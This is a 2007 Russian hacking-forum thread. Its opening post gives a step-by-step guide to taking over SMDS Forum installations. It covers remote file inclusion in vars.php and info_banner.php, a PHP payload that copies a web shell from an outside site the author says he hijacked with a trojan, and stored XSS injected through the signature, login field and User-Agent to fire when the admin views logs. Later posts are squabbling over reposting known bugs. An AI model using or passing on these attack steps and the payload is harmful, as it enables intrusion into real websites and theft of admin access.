Форумы заливка шелла в SMDS Forum

Discussion in 'Уязвимости CMS/форумов' started by BlackCats, 17 Sep 2007.

  1. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    Нашёл статейку интересную про уязвимость в этом (SMDS), хоть и мало используемом, форуме. Дырка находится в файле vars.php и позволяет без труда загрузить шелл, если на сервере разрешён инклуд URL. Для начала - ищем нашу жертву. Нашли? Читаем дальше.
    Проверяем на предмет разрешения доступа к файлу vars.php - заходим по ссылке адрес_форума/vars.php. Естественно, если доступ закрыт - будет ошибка 403. А если открыт - куча ошибок PHP.
    Среди них - одна ВАЖНАЯ:
    Warning: include() [function.include]: Failed opening '' for inclusion (include_path='.;C:\php5\pear') in C:\AppServ\www\forum\vars.php on line 110
    Берём исходник скрипта и видим строку (кому лень искать исходник - говорю, что она там ЕСТЬ ):
    include "$file_directories";
    При этом эта переменная нигде выше не задаётся в этом файле.
    Заходим по ссылке адрес_форума/vars.php?file_directories=URL_до_скрипта
    По заданной URL для удобства должен находиться файл РНР (сразу говорю - хостинг НЕ должен поддерживать РНР!) вида:
    PHP код:
    PHP:
    <?php
    copy 
    ("http://deathteam.clan.su/remview.php","remview.php");
    //Копируем шелл (задайте ссылку. По той ссылке - шелл REMVIEW.
    //Сайт не мой, а друга.
    //Я его взломал - трояном пароль угнал и залил туда шелл специально для таких вещей.
    //Сайт на Укозе - нет поддержки РНР. То что нам и надо.)
    ?>
    Всё. Если доступ к файлу vars.php закрыт - пробуем то же самое с файлом info_banner.php.
    Только на этот раз - с переменной $file_read_statistic. Думаю, понятно.
    Если и к этому файлу закрыт доступ - можно просто наделать гадостей админу форума...
    Берём и регистрируемся на форуме, а в подписи пишем
    </textarea>
    <script language="JavaScript">
    Наш скрипт...
    </script>
    И начинаем постить фигню на форуме, чтоб вынудить админа залезть в админку и удалить этого юзера. Как только он зайдёт туда - скрипт заработает. Или при авторизации написать скрипт в поле "Логин" - только кодировать его надо так, чтоб не было кавычек. Они там вырезаются. Этот скрипт сработает, если админ полезет смотреть логи удачных/неудачных авторизаций на форуме. Если нет - пишем скрипт строке User-Agent в Фаерфоксе и лазим им по форуму (изменить можно зайдя по адресу about:config). Тогда скрипт сработает при просмотре логов входа на главную.
    Вот такая вот фигня. (Написал, потому что многие этого не знают и пишут мне с вопросами типа "как сломать СМДС форум?". Понимаю, что им почти не пользуются, но мало ли...)

    (С)Eu_gen2007
     
    1 person likes this.
  2. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    видео к статье.. правда там чуть проще всё.. уже моё.
    http://video.antichat.ru/files/smds_forum_remote_include.rar
     
    2 people like this.
  3. a1ex

    a1ex Banned

    Joined:
    11 Oct 2006
    Messages:
    517
    Likes Received:
    130
    Reputations:
    -13
    Молодец!+1!
     
  4. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    спасибо большое :)
     
  5. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Я тебе поражаюсь, ты себя гером возомнил?

    Судя по этому:

    Code:
    Нашёл статейку интересную
    
    (С)Eu_gen2007
    Ты всего лишь сделал описание инклуда, но за чем? что мало статей?

    Да и еще:

    Code:
    ни 1 коммента.. ни 1 отзыва 
    Опять же, а что ты такого сделал что бы тут было 100 страниц с коментами "ооо вот это да", "оо супер", "ээ лови плюсег"? нашел уязвимости? нет. Просто сделал никому не нужное описание.

    Смотри вот инклуд файлов:

    https://forum.antichat.ru/showpost.php?p=450455&postcount=1

    Дата поста: 01.09.2007, 16:58

    Заливка шелла (инклуд и пассивные xss там тоже есть) описывалась здесь:

    https://forum.antichat.ru/showpost.php?p=387492&postcount=20

    Дата поста: 14.06.2007, 16:59

    И теперь Дата Твоего поста: 17.09.2007, 01:20

    Так всё таки что ты такого сделал?

    Только честно ты думаешь можно взять уже найденную уязвимость, запостить её снова прикрутив к ней описание для даунов, и найти в добавок пару мелких багов Запостить всё это в отдельную тему и ещё написать "ну где же отзывы"?
     
    #5 Grey, 19 Sep 2007
    Last edited: 20 Sep 2007
    3 people like this.
  6. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    я не ждал восторгов, я ждал вопросов, либо др комментов!
    + я снял видео, что тебе ненравица я непонимаю, что ты понты кидаеш типа ты гуру хакинга? да мб ты и шариш, но не все же, гугу на ачате меньшенство, и хватит уже из себя строить непонятно кого =\
    ====
    ты мне ещё темы на ачате запрети создавать? ты мне никто! и не указывай мне что делать! мои действия вписываются в правила!
     
    1 person likes this.
  7. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Я из себя никого не строю, объясни нахер нужно брать уже найденные уязвимости причем мягко говоря к далеко не самому популярному форумному движку, и делать к ним описание? для этого нет отдельной темы? ну снял ты видео, но ведь это и так все было? А твои коменты, тебя самого не тошнит? на каждый положительный отзыв ты отвечашь "Спасибо" (потом ты удаляешь этот пост и отвечаешь так же на следующий), ты это ради комментов делаешь?
     
  8. Y.Dmitriy

    Y.Dmitriy Banned

    Joined:
    14 Mar 2007
    Messages:
    208
    Likes Received:
    85
    Reputations:
    16
    в таком случае следовало бі прописать в правилах, что уязвимости выкладивать только с серверов microsoft.com,nasa.go.ua,php.net и тд...
     
    1 person likes this.
  9. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Для одарённых, смотрим правила раздела Уязвимости:

    Code:
    4. Можно создавать отдельную тему о новой уязвимости, если ВЫ нашли эту УЯЗВИМОСТЬ. Но здесь вам не секлаб или милворм.Не надо копипастить сюда баги. Эти темы будут удалены и поставлен минус.
    http://forum.antichat.ru/thread18883.html
     
  10. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    Ты так и не научился искать уязвимости сам.

    [​IMG]
     
    4 people like this.
  11. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    а теперь смторим на месяц.. это МАРТ!!!!
    я тогда реально ничего не умел, но хотел научица, и научился.
     
  12. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    lol
     
  13. Alexsize

    Alexsize Fail

    Joined:
    17 Sep 2005
    Messages:
    1,771
    Likes Received:
    1,221
    Reputations:
    704
    Offtop: To Ksander: Чел, я был о тебе лучшего мнения. Сообщение конечно ржачное, спору нет, но выкладывать его из своего ПМ... мягко говоря низко.
     
    #13 Alexsize, 19 Sep 2007
    Last edited: 19 Sep 2007
    3 people like this.